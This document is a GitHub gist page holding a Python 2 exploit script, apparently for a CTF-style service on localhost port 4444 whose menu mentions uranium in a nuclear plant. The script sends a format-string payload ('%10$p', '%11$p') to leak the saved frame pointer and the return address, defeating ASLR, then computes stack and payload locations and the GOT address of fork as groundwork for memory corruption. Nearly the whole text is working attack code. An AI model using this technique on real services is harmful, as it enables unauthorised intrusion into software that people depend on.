Instantly share code, notes, and snippets.

Embed
What would you like to do?
import netcatlib
# Step 0 --- Connect to the target
nc = netcatlib.Netcat("localhost", 4444)
print "[+] Connected"
# Step 1a --- Defeating ASLR with information leakage: location of stack
INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
nc.write(INFOLEAK+"A"*(100-len(INFOLEAK))+"\x01\x01"*4+"\xFF\xFF"+"\n")
nc.read_until("Uranium in nuclear plant \"")
ebp = int(nc.read_until(":ENDEBP:")[:-8], 16)
print "[+] Saved frame pointer :", hex(ebp)
location_ebp = ebp - 0x440
location_ebp_printf = location_ebp - 0x30
location_payload = ebp + 0x20 + 10*112
print " > Location saved fp :", hex(location_ebp)
print " > Location fp in printf :", hex(location_ebp_printf)
print " > Location of 1st payload :", hex(location_payload)
# Step 1b --- Defeating ASLR with information leakage: location of stack
ret = int(nc.read_until(":ENDRET:")[:-8], 16)
print "[+] Return address :", hex(ret)
location_got_fork = ret + 0x2E8E
print " > Location of fork in GOT :", hex(location_got_fork)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment